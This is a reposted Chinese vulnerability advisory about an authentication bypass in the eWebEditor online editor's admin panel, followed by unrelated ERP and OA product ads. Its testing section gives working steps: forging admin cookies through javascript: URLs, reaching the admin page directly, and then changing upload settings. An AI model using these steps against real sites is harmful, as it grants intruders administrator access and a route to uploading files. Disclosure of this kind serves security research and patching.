ewebeditor php&asp版本后台跳过认证漏洞-适用于asp2.8 PHP3.8

400 186 1886

ewebeditor php&asp版本后台跳过认证漏洞-适用于asp2.8 PHP3.8

当前位置：点晴教程→知识管理交流 →『技术文档交流』

admin

2010年8月13日 10:20 本文热度 4467

SSV ID:19010

SEBUG-Appdir:eWebEditor

发布时间:2009-12-12

影响版本:

php v3.8

asp v2.8

漏洞描述:

eWebEditor是一个所见即所得的在线编辑器。顾名思义，就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。

../ewebeditor/admin/config.php文件

用户认证方式存在严重的安全漏洞，可以直接跳过认证获取到管理员权限。

<*参考

http://hi.baidu.com/smc2816/blog/item/b1dc4f54485116ceb645ae27.html

测试方法:

[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.

这时候你清空浏览器的url,然后输入 

javascript:alert(document.cookie="adminuser="+escape("admin")); 

javascript:alert(document.cookie="adminpass="+escape("admin")); 

javascript:alert(document.cookie="admindj="+escape("1"));

后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php

哈哈,直接进去了,利用和asp一样,新增样式修改上传,就ok了

SEBUG安全建议:

暂无

请参考官方补丁

// sebug.net [2010-01-27]

该文章在 2010/8/13 10:20:56 编辑过

关键字查询

正在查询...

点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。

点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理，结合码头的业务特点，围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体，是物流码头及其他港口类企业的高效ERP管理信息系统。

点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。

点晴免费OA是一款软件和通用服务都免费，不限功能、不限时间、不限用户的免费OA协同办公管理系统。